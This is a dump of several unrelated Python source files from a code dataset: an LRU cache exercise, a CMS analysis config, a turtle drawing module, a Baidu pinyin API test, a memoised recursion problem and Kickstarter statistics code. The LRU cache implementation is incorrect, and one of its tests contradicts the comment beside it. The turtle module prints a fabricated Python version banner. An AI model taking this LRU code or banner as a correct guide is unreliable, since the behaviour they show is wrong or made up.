LRU_Cache(object):\n \"\"\"\n Defines a LRU Cache object.\n \"\"\"\n\n def __init__(self, capacity=5):\n # Initialize class variables\n self.data = {}\n self.capacity = capacity\n\n def get(self, key):\n # Retrieve item from provided key. Return -1 if nonexistent.\n try:\n return self.data[key]\n except KeyError:\n return -1\n\n def set(self, key, value):\n # Set the value if the key is not present in the cache. If the cache is at capacity remove the oldest item.\n if self.capacity == len(self.data.keys()):\n total_keys = list(self.data.keys())\n first_key = total_keys[0]\n del self.data[first_key]\n else:\n if key in self.data:\n print(\"The key already exists in the LRU Cache!\")\n else:\n self.data[key] = value\n# LRU CACHE\n\n\n# TESTS\n# Udacity Tests\nprint(\"[RUNNING] Running Udacity tests...\\n\")\nour_cache = LRU_Cache(5)\n\nour_cache.set(1, 1)\nour_cache.set(2, 2)\nour_cache.set(3, 3)\nour_cache.set(4, 4)\n\n\nprint(our_cache.get(1)) # returns 1\nprint(our_cache.get(2)) # returns 2\nprint(our_cache.get(9)) # returns -1 because 9 is not present in the cache\n\nassert(our_cache.get(1) == 1)\nassert(our_cache.get(2) == 2)\nassert(our_cache.get(9) == -1)\n\nour_cache.set(5, 5)\nour_cache.set(6, 6)\n\n# returns -1 because the cache reached it's capacity and 3 was the least recently used entry\nprint(our_cache.get(3))\n\nassert(our_cache.get(3) == 3)\n\nprint(\"\\n[PASS] Finished running Udacity tests!\")\n\n# Student Tests\nprint(\"[RUNNING] Running student tests!\\n\")\ncache = LRU_Cache(4)\ncache.set(1, 2)\nprint(cache.get(1))\ncache.set(3, 4)\ncache.set(833, 34)\ncache.set(34, 3)\ncache.set(45, 3)\nprint(cache.get(5)) # returns -1\nprint(cache.get(3)) # retunrns 4\nprint(cache.get(833)) # returns 34\nprint(cache.get(34)) # returns 3\nprint(cache.get(45)) # returns 3\nprint(cache.get(1)) # returns -1\nprint(\"\\n[PASS] Finished running student tests!\")\n# TESTS\n","sub_path":"LRU_Cache.py","file_name":"LRU_Cache.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"600667751","text":"import FWCore.ParameterSet.Config as cms\n\n## ---\n## use this file to test the GenJetComposition.cc module\n## ---\n\n\n# set sequence shortcut\nprocess = cms.Process(\"Selection\")\n\n## configure message logger\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.threshold = 'INFO'\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\n\n## define input\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring( \n ## add your favourite file here\n #'/store/user/henderle/Spring10/WJets_MAD/PATtuple_1.root'\n '/store/user/henderle/Test/PATtuple.root'\n ),\n skipEvents = cms.untracked.uint32(0)\n )\n\n## define maximal number of events to loop over\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\n\n## configure process options\nprocess.options = cms.untracked.PSet(\n wantSummary = cms.untracked.bool(True)\n)\n\n## register TFileService\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('analyzeGenJetComposition_test.root')\n)\n\n## ---\n## load GenJetComposition\n## ---\n\n## get particle content of jets with IDs\nprocess.load(\"TopAnalysis.TopAnalyzer.GenJetComposition_cfi\")\nprocess.analyzeGenJetCompositionAll = process.analyzeGenJetComposition.clone()\n\n## ---\n## run the final sequence\n## ---\n\nprocess.p1 = cms.Path(\n ## apply the analyzer\n process.analyzeGenJetCompositionAll \n )\n","sub_path":"TopAnalyzer/test/analyzeGenJetComposition_cfg.py","file_name":"analyzeGenJetComposition_cfg.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"51107560","text":"\"\"\"A module to draw tkinter on turtlescreen.\"\"\"\r\nfrom turtle import *\r\nfrom sys import *\r\nfrom sys import _getframe\r\nfrom os import *\r\nt = Pen()\r\nt.hideturtle()\r\nsetup(500, 500)\r\n\r\n\r\nrandom_functions = ['random_polygon', 'random_rectangles', 'one_random_rectangle']\r\ndemo_function = ['demo']\r\nfunctions = ['create_canvas', 'create_line', 'create_rectangle', 'create_triangle',\r\n 'create_text', 'create_circle', 'create_semicircle', 'create_polygon',\r\n random_functions, demo_function]\r\n\r\n\r\nif 'create_semicircle' in functions:\r\n tt_version = 1.0\r\nif 'create_polygon' in functions:\r\n tt_version = 1.5\r\nif random_functions and demo_function in functions:\r\n tt_version = 2.0\r\nif 'one_random_rectangle' in random_functions:\r\n tt_version = 2.5\r\nif 'random_rectangles' in random_functions:\r\n tt_version = 3.0\r\nelse:\r\n tt_version = 0.5\r\n \r\ndef isWindows64():\r\n return 'PROGRAMFILES(X86)' in environ\r\n\r\ntry:\r\n if isWindows64():\r\n print('TurtleTk %s (Run on python %s:20a20b02a02, Feb 02 2020, 20:20:20) [MSC v%s 64 bit (AMD64)] on win64) ' % (tt_version, version[0:5], tt_version))\r\n else:\r\n print('TurtleTk %s (Run on python %s:20a20b02a02, Feb 02 2020, 20:20:20) [MSC v%s 32 bit (Intel)] on win32) ' % (tt_version, version[0:5], tt_version))\r\nexcept:\r\n print('TurtleTk %s (Run on python %s:20a20b02a02, Feb 02 2020, 20:20:20) [MSC v%s 64 bit (AMD64)] on win64) ' % (tt_version, version[0:5], tt_version))\r\n\r\n \r\n\"\"\"\r\nArgument:\r\n x1/y1/x2/y2/points/... ----- The postion of the image.\r\n width/height ----- The big of the screen.\r\n speed ----- The turtlepen's speed.\r\n thick ----- The turtlepen's width(thick).\r\n outline ----- The turtlepen's color.\r\n fill ----- The picture's color.\r\n size ----- The text's size.\r\n radius ----- The circle or semicircle's radius.\r\n up ----- The semicircle's degrees left or right(True/False(default)).\r\n many ----- How many are random polygon.\r\nExample:\r\n >>> from turtleTk_class import *\r\n >>> c = Create()\r\n >>> c.create_text('HiHello!')\r\n\"\"\"\r\n\r\nclass Create():\r\n def create_canvas(self, width = 500, height = 500, color = 'white'):\r\n setup(width, height)\r\n bgcolor(color)\r\n\r\n def create_line(self, x1, y1, x2, y2, speed = 8, thick = 1, outline = 'black'):\r\n t.speed(speed)\r\n t.width(thick)\r\n t.color(outline)\r\n t.penup()\r\n t.setpos(x1, y1)\r\n t.pendown()\r\n t.goto(x2, y2)\r\n t.penup()\r\n done()\r\n\r\n def create_rectangle(self, x1, y1, x2, y2, speed = 8, thick = 1, outline = 'black', fill = 'white'):\r\n t.speed(speed)\r\n t.width(thick)\r\n t.penup()\r\n t.setpos(x1, y1)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.begin_fill()\r\n t.color(outline)\r\n t.pendown()\r\n t.goto(x2, y1)\r\n t.goto(x2, y2)\r\n t.goto(x1, y2)\r\n t.goto(x1, y1)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.end_fill()\r\n t.penup()\r\n if _getframe(1).f_code.co_name == '' or _getframe(1).f_code.co_name == 'demo':\r\n done()\r\n\r\n def create_triangle(self, x1, y1, x2, y2, x3, y3, speed = 8, thick = 1, outline = 'black', fill = 'white'):\r\n t.speed(speed)\r\n a = ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\r\n b = ((x3 - x2) ** 2 + (y3 - y2) ** 2) ** 0.5\r\n c = ((x3 - x1) ** 2 + (y3 - y1) ** 2) ** 0.5\r\n if (a + b <= c) or (a + c <= b) or (b + c <= a):\r\n raise ValueError('Could not make triangles!')\r\n t.width(thick)\r\n t.penup()\r\n t.setpos(x1, y1)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.begin_fill()\r\n t.color(outline)\r\n t.pendown()\r\n t.goto(x2, y2)\r\n t.goto(x3, y3)\r\n t.goto(x1, y1)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.end_fill()\r\n t.penup()\r\n done()\r\n\r\n def create_text(self, text, x1 = 0, y1 = 0, size = 35):\r\n t.penup()\r\n t.setpos(x1, y1)\r\n t.pendown()\r\n t.write(text, font=(\"华文楷体\", 25, \"normal\"))\r\n done()\r\n\r\n def create_circle(self, centerx, centery, radius, speed = 8, thick = 1, outline = 'black', fill = 'white'):\r\n t.speed(speed)\r\n t.width(thick)\r\n t.penup()\r\n t.setpos(centerx, centery)\r\n t.left(90)\r\n t.forward(radius)\r\n t.left(90)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.begin_fill()\r\n t.color(outline)\r\n t.pendown()\r\n t.circle(radius)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.end_fill()\r\n t.penup()\r\n t.goto(centerx, centery)\r\n if fill == 'white': \r\n t.pendown()\r\n t.circle(0.5)\r\n t.penup()\r\n done()\r\n\r\n def create_semicircle(self, x1, y1, radius, up = False, speed = 8, thick = 1, outline = 'black'):\r\n t.speed(speed)\r\n t.width(thick)\r\n t.penup()\r\n t.setpos(x1, y1)\r\n t.color(outline)\r\n t.right(90)\r\n t.pendown()\r\n if up == True:\r\n t.circle(radius, -180)\r\n else:\r\n t.circle(radius, 180)\r\n t.penup()\r\n done()\r\n\r\n def create_polygon(self, points, speed = 8, thick = 1, outline = 'black', fill = 'white'):\r\n t.speed(speed)\r\n t.width(thick)\r\n t.penup()\r\n if fill != 'white':\r\n t.color(fill)\r\n t.begin_fill()\r\n t.color(outline)\r\n t.pendown()\r\n for x, y in points:\r\n t.goto(x, y)\r\n t.goto(points[0])\r\n if fill != 'white':\r\n t.color(fill)\r\n t.end_fill()\r\n t.penup()\r\n done()\r\n\r\n\r\nclass Random():\r\n def random_rectangles(self, many = 25):\r\n for x in range(0, many):\r\n self.one_random_rectangle()\r\n \r\n def one_random_rectangle(self):\r\n from random import randrange, choice\r\n colors = ['green', 'red', 'blue', 'pink', 'purple', 'violet', 'magenta', 'cyan']\r\n x11 = randrange(-250, 250)\r\n x22 = randrange(-250, 250)\r\n y11 = x11 + randrange(-50, 20)\r\n y22 = x22 + randrange(-50, 20)\r\n color = choice(colors)\r\n c = Create()\r\n c.create_rectangle(x11, y11, x22, y22, fill = color)\r\n\r\n def random_polygon(self, many = 25):\r\n from random import randint\r\n a = []\r\n for q in range(many):\r\n x = randint(-250, 250)\r\n y = randint(-250, 250)\r\n p = (x, y)\r\n a.append(p)\r\n c = Create()\r\n c.create_polygon(a)\r\n\r\ndef demo():\r\n c = Create()\r\n r = Random()\r\n #c.create_canvas(color = 'blue')\r\n #c.create_line(-100, -100, 100, 100)\r\n #c.create_rectangle(-100, -100, 100, 100)\r\n #c.create_triangle(0, 0, 100, 200, 200, 220)\r\n #c.create_triangle(0, 0, 0, 0, 200, 220) #Error\r\n #c.create_text('Hiturtle!')\r\n #c.create_circle(0, 0, 125, thick = 50) #Very THICC\r\n #c.create_circle(0, 0, 75, fill = 'green')\r\n #c.create_semicircle(0, 0, 75)\r\n #c.create_semicircle(0, 0, 75, True)\r\n #c.create_polygon([[0, 0], [0, 100], [100, 100], [100, 0]])\r\n #r.random_rectangles()\r\n #r.one_random_rectangle()\r\n #r.random_polygon()\r\n\r\nif __name__ == '__main__':\r\n demo()\r\n\r\n","sub_path":"module 文件/turtleTk_class.py","file_name":"turtleTk_class.py","file_ext":"py","file_size_in_byte":7963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"479425849","text":"import os\r\nimport sys\r\nimport json\r\n\r\nimport requests\r\n\r\nfrom pprint import pprint\r\n\r\n'''\r\nhttp://olime.baidu.com/py\r\n参数:\r\n@input=拼音项目\r\n@inputtype=py 这个地方写py应该是拼音的意思\r\n@bg=0 暂时不清楚什么鬼\r\n@ed=20 暂时不清楚什么鬼\r\n@result=hanzi 暂时不清楚什么鬼\r\n@resultcoding=utf-8 字符编码,当前试出来的有utf-8和Unicode\r\n@ch_en=0 暂时不清楚什么鬼,可能有跟英文备选相关的东西\r\n@clientinfo=web 肯定的要web,其他client可能会有桌面的\r\n@version=1 没试过其他的\r\n\r\n\r\n\r\n\r\nTemplate:\r\n{\r\n \"status\": \"T\",\r\n \"errno\": \"0\",\r\n \"errmsg\": \"\",\r\n \"result\": [[[\"备选词\",消耗字符数量,{\r\n \"pinyin\": \"对应拼音\",\r\n \"type\": \"来源\"\r\n }]\r\n \"拼音分词\"]\r\n}\r\n\r\n'''\r\n\r\n\r\ndef main():\r\n # data = {\r\n # \"input\": \"xingqu\",\r\n # \"inputtype\": \"py\",\r\n # \"bg\": 0,\r\n # \"ed\": 20,\r\n # \"result\": \"hanzi\",\r\n # \"resultcoding\": \"utf-8\",\r\n # \"ch_en\": 0,\r\n # \"clientinfo\": \"web\",\r\n # \"version\": 1,\r\n #\r\n # }\r\n #\r\n #\r\n # # url=\"http://olime.baidu.com/py\"\r\n # url=\"http://olime.baidu.com/py?py=bit&rn=0&pn=5\"\r\n # ret=requests.post(url,data=data)\r\n #\r\n # print(ret.text)\r\n #\r\n # content=ret.text\r\n #\r\n # obj=json.loads(content)\r\n #\r\n #\r\n # pprint(obj)\r\n\r\n\r\n def get_same_pice_pair(src_pieces, mod_pieces, step_threshold=100):\r\n pair = []\r\n m = set()\r\n n = set()\r\n for i in range(len(src_pieces)):\r\n src = src_pieces[i]\r\n step = 0\r\n for j in range(max(0, i - 20), len(mod_pieces), 1):\r\n mod = mod_pieces[j]\r\n step += 1\r\n if src != mod or step > step_threshold:\r\n continue\r\n else:\r\n pair.append(((i, j), (src, mod)))\r\n m.add(i)\r\n n.add(j)\r\n break\r\n # print(pair)\r\n return pair, m, n\r\n\r\n a = ['▁一审法院认定事实', ':', '原', '、', '被告于', '2018', '年', '4', '月', '20', '日经', '财务', '对', '帐', '单', '作出', '的大', '连',\r\n '荣华', '彩', '印', '包装', '有限公司', '财务', '帐', '目', '对账单', ',', '被告', '对该', '对账单', '真实性', '、', '合法性', '、', '关联性',\r\n '均', '没有异议', '。']\r\n b = ['▁一', '申', '法院', '认定', '似', '实', ':', '原', '、', '被告于', '2018', '年', '4', '月', '20', '日经', '材', '务', '对', '帐',\r\n '单', '作出', '的大', '连', '荣华', '彩', '印', '包装', '有限公司', '财务', '帐', '目', '对账单', ',', '被告', '对该', '对', '单', '真实性',\r\n '、', '合法性', '、', '关联性', '均', '没有异议', '。']\r\n print(len(a), len(b))\r\n\r\n print(a[-5],b[41],a[-5]==b[41])\r\n\r\n cc, m, n = get_same_pice_pair(b,a)\r\n\r\n print(sorted(set(list([i for i in range(len(a))])) - m))\r\n print(sorted(set(list([i for i in range(len(b))])) - n))\r\n\r\n for c in cc:\r\n print(c)\r\n\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n pass\r\n","sub_path":"test_for_miao.py","file_name":"test_for_miao.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552644701","text":"# https://www.acmicpc.net/problem/9184\n\n\ndef w(memo, a, b, c):\n\n if a <= 0 or b <= 0 or c <= 0:\n return 1\n\n if a > 20 or b > 20 or c > 20:\n return w(memo, 20, 20, 20)\n\n if memo[a][b][c] is None:\n if a < b < c:\n memo[a][b][c] = w(memo, a, b, c-1)\\\n + w(memo, a, b-1, c-1) - w(memo, a, b-1, c)\n else:\n memo[a][b][c] = w(memo, a-1, b, c) + w(memo, a-1, b-1, c)\\\n + w(memo, a-1, b, c-1) - w(memo, a-1, b-1, c-1)\n\n return memo[a][b][c]\n\n\ndef sol():\n memo = [[[None for c in range(21)] for b in range(21)] for a in range(21)]\n\n while True:\n a, b, c = map(int, input().split())\n if a == -1 and b == -1 and c == -1:\n break\n\n print(\"w(%d, %d, %d) = %d\" % (a, b, c, w(memo, a, b, c)))\n\n\nif __name__ == \"__main__\":\n sol()\n","sub_path":"개인적으로 푼 문제/실버/신나는 함수 실행/신나는 함수 실행.py","file_name":"신나는 함수 실행.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"337510842","text":"from modules import search\r\nfrom datetime import datetime\r\n\r\ndef getCountryStats(projectList):\r\n\r\n countryStats = {\r\n \"AU\": 0,\r\n \"BE\": 0,\r\n \"CA\": 0,\r\n \"CH\": 0,\r\n \"DE\": 0,\r\n \"DK\": 0,\r\n \"ES\": 0,\r\n \"FR\": 0,\r\n \"GB\": 0,\r\n \"HK\": 0,\r\n \"IE\": 0,\r\n \"IT\": 0,\r\n \"JP\": 0,\r\n \"LU\": 0,\r\n \"MX\": 0,\r\n \"NL\": 0,\r\n \"NO\": 0,\r\n \"NZ\": 0,\r\n \"SE\": 0,\r\n \"SG\": 0,\r\n \"UNK\": 0,\r\n \"US\": 0\r\n }\r\n\r\n for project in projectList:\r\n #Australia\r\n if project['country'] == \"AU\":\r\n countryStats[\"AU\"] += 1\r\n #Belgium\r\n elif project['country'] == \"BE\":\r\n countryStats[\"BE\"] += 1\r\n #Canada\r\n elif project['country'] == \"CA\":\r\n countryStats[\"CA\"] += 1\r\n #China\r\n elif project['country'] == \"CH\":\r\n countryStats[\"CH\"] += 1\r\n #Germany\r\n elif project['country'] == \"DE\":\r\n countryStats[\"DE\"] += 1\r\n #Denmark\r\n elif project['country'] == \"DK\":\r\n countryStats[\"DK\"] += 1\r\n #Spain\r\n elif project['country'] == \"ES\":\r\n countryStats[\"ES\"] += 1\r\n #France\r\n elif project['country'] == \"FR\":\r\n countryStats[\"FR\"] += 1\r\n #Great Britain\r\n elif project['country'] == \"GB\":\r\n countryStats[\"GB\"] += 1\r\n #Hong Kong\r\n elif project['country'] == \"HK\":\r\n countryStats[\"HK\"] += 1\r\n #Ireland\r\n elif project['country'] == \"IE\":\r\n countryStats[\"IE\"] += 1\r\n #Italy\r\n elif project['country'] == \"IT\":\r\n countryStats[\"IT\"] += 1\r\n #Japan\r\n elif project['country'] == \"JP\":\r\n countryStats[\"JP\"] += 1\r\n #Luxembourg\r\n elif project['country'] == \"LU\":\r\n countryStats[\"LU\"] += 1\r\n #Mexico\r\n elif project['country'] == \"MX\":\r\n countryStats[\"MX\"] += 1\r\n #Netherlands\r\n elif project['country'] == \"NL\":\r\n countryStats[\"NL\"] += 1\r\n #Norway\r\n elif project['country'] == \"NO\":\r\n countryStats[\"NO\"] += 1\r\n #New Zealand\r\n elif project['country'] == \"NZ\":\r\n countryStats[\"NZ\"] += 1\r\n #Sweden\r\n elif project['country'] == \"SE\":\r\n countryStats[\"SE\"] += 1\r\n #Singapore\r\n elif project['country'] == \"SG\":\r\n countryStats[\"SG\"] += 1\r\n #Unknown\r\n elif project['country'] == \"UNK\":\r\n countryStats[\"UNK\"] += 1\r\n #United States\r\n elif project['country'] == \"US\":\r\n countryStats[\"US\"] += 1\r\n return countryStats\r\n\r\ndef getCategoryStats(projectList):\r\n\r\n categoryStats = {\r\n \"Comics\": 0,\r\n \"Crafts\": 0,\r\n \"Dance\": 0,\r\n \"Fashion\": 0,\r\n #Amperstand (&) is weird on graph so we manually spell it out\r\n \"Film and Video\": 0,\r\n \"Food\": 0,\r\n \"Journalism\": 0,\r\n \"Games\": 0,\r\n \"Music\": 0,\r\n \"Photography\": 0,\r\n \"Publishing\": 0,\r\n \"Technology\": 0,\r\n \"Theater\": 0\r\n }\r\n \r\n for project in projectList:\r\n if project['main_category'] == \"Comics\":\r\n categoryStats[\"Comics\"] += 1\r\n\r\n elif project['main_category'] == \"Crafts\":\r\n categoryStats[\"Crafts\"] += 1\r\n\r\n elif project['main_category'] == \"Dance\":\r\n categoryStats[\"Dance\"] += 1\r\n\r\n elif project['main_category'] == \"Fashion\":\r\n categoryStats[\"Fashion\"] += 1\r\n\r\n elif project['main_category'] == \"Film & Video\":\r\n categoryStats[\"Film and Video\"] += 1\r\n\r\n elif project['main_category'] == \"Food\":\r\n categoryStats[\"Food\"] += 1\r\n\r\n elif project['main_category'] == \"Journalism\":\r\n categoryStats[\"Journalism\"] += 1\r\n\r\n elif project['main_category'] == \"Games\":\r\n categoryStats[\"Games\"] += 1\r\n\r\n elif project['main_category'] == \"Music\":\r\n categoryStats[\"Music\"] += 1\r\n\r\n elif project['main_category'] == \"Photography\":\r\n categoryStats[\"Photography\"] += 1\r\n\r\n elif project['main_category'] == \"Publishing\":\r\n categoryStats[\"Publishing\"] += 1\r\n\r\n elif project['main_category'] == \"Technology\":\r\n categoryStats[\"Technology\"] += 1\r\n \r\n elif project['main_category'] == \"Theater\":\r\n categoryStats[\"Theater\"] += 1 \r\n\r\n return categoryStats\r\n\r\ndef getFailedTakeoffStats(projectList):\r\n zeroBackersList = (search.search(\"0\", \"backers\", projectList))\r\n\r\n failedTakeoffStats = {\r\n \"Comics\": 0,\r\n \"Crafts\": 0,\r\n \"Dance\": 0,\r\n \"Fashion\": 0,\r\n #Amperstand (&) is weird on graph so we manually spell it out\r\n \"Film and Video\": 0,\r\n \"Food\": 0,\r\n \"Journalism\": 0,\r\n \"Games\": 0,\r\n \"Music\": 0,\r\n \"Photography\": 0,\r\n \"Publishing\": 0,\r\n \"Technology\": 0,\r\n \"Theater\": 0\r\n }\r\n \r\n for project in zeroBackersList:\r\n if project['main_category'] == \"Comics\":\r\n failedTakeoffStats[\"Comics\"] += 1\r\n\r\n elif project['main_category'] == \"Crafts\":\r\n failedTakeoffStats[\"Crafts\"] += 1\r\n\r\n elif project['main_category'] == \"Dance\":\r\n failedTakeoffStats[\"Dance\"] += 1\r\n\r\n elif project['main_category'] == \"Fashion\":\r\n failedTakeoffStats[\"Fashion\"] += 1\r\n\r\n elif project['main_category'] == \"Film & Video\":\r\n failedTakeoffStats[\"Film and Video\"] += 1\r\n\r\n elif project['main_category'] == \"Food\":\r\n failedTakeoffStats[\"Food\"] += 1\r\n\r\n elif project['main_category'] == \"Journalism\":\r\n failedTakeoffStats[\"Journalism\"] += 1\r\n\r\n elif project['main_category'] == \"Games\":\r\n failedTakeoffStats[\"Games\"] += 1\r\n\r\n elif project['main_category'] == \"Music\":\r\n failedTakeoffStats[\"Music\"] += 1\r\n\r\n elif project['main_category'] == \"Photography\":\r\n failedTakeoffStats[\"Photography\"] += 1\r\n\r\n elif project['main_category'] == \"Publishing\":\r\n failedTakeoffStats[\"Publishing\"] += 1\r\n\r\n elif project['main_category'] == \"Technology\":\r\n failedTakeoffStats[\"Technology\"] += 1\r\n\r\n elif project['main_category'] == \"Theater\":\r\n failedTakeoffStats[\"Theater\"] += 1 \r\n\r\n return failedTakeoffStats\r\n\r\ndef getMostSuccessfulCategoryStats(projectList):\r\n successfulStateList = (search.search(\"successful\", \"state\", projectList))\r\n\r\n mostSuccessfulStats = {\r\n \"Comics\": 0,\r\n \"Crafts\": 0,\r\n \"Dance\": 0,\r\n \"Fashion\": 0,\r\n #Amperstand (&) is weird on graph so we manually spell it out\r\n \"Film and Video\": 0,\r\n \"Food\": 0,\r\n \"Journalism\": 0,\r\n \"Games\": 0,\r\n \"Music\": 0,\r\n \"Photography\": 0,\r\n \"Publishing\": 0,\r\n \"Technology\": 0,\r\n \"Theater\": 0\r\n }\r\n \r\n for project in successfulStateList:\r\n if project['main_category'] == \"Comics\":\r\n mostSuccessfulStats[\"Comics\"] += 1\r\n\r\n elif project['main_category'] == \"Crafts\":\r\n mostSuccessfulStats[\"Crafts\"] += 1\r\n\r\n elif project['main_category'] == \"Dance\":\r\n mostSuccessfulStats[\"Dance\"] += 1\r\n\r\n elif project['main_category'] == \"Fashion\":\r\n mostSuccessfulStats[\"Fashion\"] += 1\r\n\r\n elif project['main_category'] == \"Film & Video\":\r\n mostSuccessfulStats[\"Film and Video\"] += 1\r\n\r\n elif project['main_category'] == \"Food\":\r\n mostSuccessfulStats[\"Food\"] += 1\r\n\r\n elif project['main_category'] == \"Journalism\":\r\n mostSuccessfulStats[\"Journalism\"] += 1\r\n\r\n elif project['main_category'] == \"Games\":\r\n mostSuccessfulStats[\"Games\"] += 1\r\n\r\n elif project['main_category'] == \"Music\":\r\n mostSuccessfulStats[\"Music\"] += 1\r\n\r\n elif project['main_category'] == \"Photography\":\r\n mostSuccessfulStats[\"Photography\"] += 1\r\n\r\n elif project['main_category'] == \"Publishing\":\r\n mostSuccessfulStats[\"Publishing\"] += 1\r\n\r\n elif project['main_category'] == \"Technology\":\r\n mostSuccessfulStats[\"Technology\"] += 1\r\n\r\n elif project['main_category'] == \"Theater\":\r\n mostSuccessfulStats[\"Theater\"] += 1 \r\n\r\n #We have the stats on successful projects from each category, now we need the total number of projects from each category to divide and get percentages\r\n categoryStats = getCategoryStats(projectList) \r\n mostSuccessfulStats[\"Comics\"] = round((mostSuccessfulStats[\"Comics\"]/categoryStats[\"Comics\"] * 100), 2)\r\n mostSuccessfulStats[\"Crafts\"] = round((mostSuccessfulStats[\"Crafts\"]/categoryStats[\"Crafts\"] * 100), 2)\r\n mostSuccessfulStats[\"Dance\"] = round((mostSuccessfulStats[\"Dance\"]/categoryStats[\"Dance\"] * 100), 2)\r\n mostSuccessfulStats[\"Fashion\"] = round((mostSuccessfulStats[\"Fashion\"]/categoryStats[\"Fashion\"] * 100), 2)\r\n mostSuccessfulStats[\"Film and Video\"] = round((mostSuccessfulStats[\"Film and Video\"]/categoryStats[\"Film and Video\"] * 100), 2)\r\n mostSuccessfulStats[\"Food\"] = round((mostSuccessfulStats[\"Food\"]/categoryStats[\"Food\"] * 100), 2)\r\n mostSuccessfulStats[\"Journalism\"] = round((mostSuccessfulStats[\"Journalism\"]/categoryStats[\"Journalism\"] * 100), 2)\r\n mostSuccessfulStats[\"Games\"] = round((mostSuccessfulStats[\"Games\"]/categoryStats[\"Games\"] * 100), 2)\r\n mostSuccessfulStats[\"Music\"] = round((mostSuccessfulStats[\"Music\"]/categoryStats[\"Music\"] * 100), 2)\r\n mostSuccessfulStats[\"Photography\"] = round((mostSuccessfulStats[\"Photography\"]/categoryStats[\"Photography\"] * 100), 2)\r\n mostSuccessfulStats[\"Publishing\"] = round((mostSuccessfulStats[\"Publishing\"]/categoryStats[\"Publishing\"] * 100), 2)\r\n mostSuccessfulStats[\"Technology\"] = round((mostSuccessfulStats[\"Technology\"]/categoryStats[\"Technology\"] * 100), 2)\r\n mostSuccessfulStats[\"Theater\"] = round((mostSuccessfulStats[\"Theater\"]/categoryStats[\"Theater\"] * 100), 2) \r\n\r\n return mostSuccessfulStats\r\n\r\ndef getSuccessPercentageStats(projectList):\r\n successfulStateList = (search.search(\"successful\", \"state\", projectList))\r\n mostSuccessfulStats = {\r\n \"Total Success\": 0,\r\n \r\n #Amperstand (&) is weird on graph so we manually spell it out\r\n }\r\n \r\n for project in successfulStateList:\r\n mostSuccessfulStats[\"Total Success\"] += 1\r\n \r\n totalProj= 0\r\n \r\n for project in projectList:\r\n totalProj +=1\r\n categoryStats = getCategoryStats(projectList) \r\n mostSuccessfulStats[\"Total Success\"] = round((mostSuccessfulStats[\"Total Success\"]/totalProj* 100), 2)\r\n \r\n return mostSuccessfulStats\r\n\r\ndef getFundingVersusSuccessStats(projectList):\r\n\r\n #Count all of the successes and failures in each bracket, so we can divide them and get percentages afterward. Probably a way more efficient way to do this, look into it later!\r\n rawFundingVersusSuccessStats = {\r\n \"0-100 Success\": 0,\r\n \"0-100 Failed\": 0,\r\n \"101-1,000 Success\": 0,\r\n \"101-1,000 Failed\": 0,\r\n \"1,001-10,000 Success\": 0,\r\n \"1,001-10,000 Failed\": 0,\r\n \"10,001-100,000 Success\": 0,\r\n \"10,001-100,000 Failed\": 0,\r\n \"100,001-1,000,000 Success\": 0,\r\n \"100,001-1,000,000 Failed\": 0,\r\n \"1,000,001+ Success\": 0,\r\n \"1,000,001+ Failed\": 0\r\n }\r\n\r\n for project in projectList:\r\n if project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) <= 100:\r\n rawFundingVersusSuccessStats[\"0-100 Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) <= 100:\r\n rawFundingVersusSuccessStats[\"0-100 Failed\"] += 1\r\n\r\n elif project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) > 100 and float(project[\"usd_goal_real\"]) <= 1000:\r\n rawFundingVersusSuccessStats[\"101-1,000 Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) > 100 and float(project[\"usd_goal_real\"]) <= 1000:\r\n rawFundingVersusSuccessStats[\"101-1,000 Failed\"] += 1\r\n \r\n elif project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) > 1000 and float(project[\"usd_goal_real\"]) <= 10000:\r\n rawFundingVersusSuccessStats[\"1,001-10,000 Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) > 1000 and float(project[\"usd_goal_real\"]) <= 10000:\r\n rawFundingVersusSuccessStats[\"1,001-10,000 Failed\"] += 1\r\n \r\n elif project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) > 10000 and float(project[\"usd_goal_real\"]) <= 100000:\r\n rawFundingVersusSuccessStats[\"10,001-100,000 Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) > 10000 and float(project[\"usd_goal_real\"]) <= 100000:\r\n rawFundingVersusSuccessStats[\"10,001-100,000 Failed\"] += 1\r\n\r\n elif project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) > 100000 and float(project[\"usd_goal_real\"]) <= 1000000:\r\n rawFundingVersusSuccessStats[\"100,001-1,000,000 Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) > 100000 and float(project[\"usd_goal_real\"]) <= 1000000:\r\n rawFundingVersusSuccessStats[\"100,001-1,000,000 Failed\"] += 1\r\n\r\n elif project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) > 1000000:\r\n 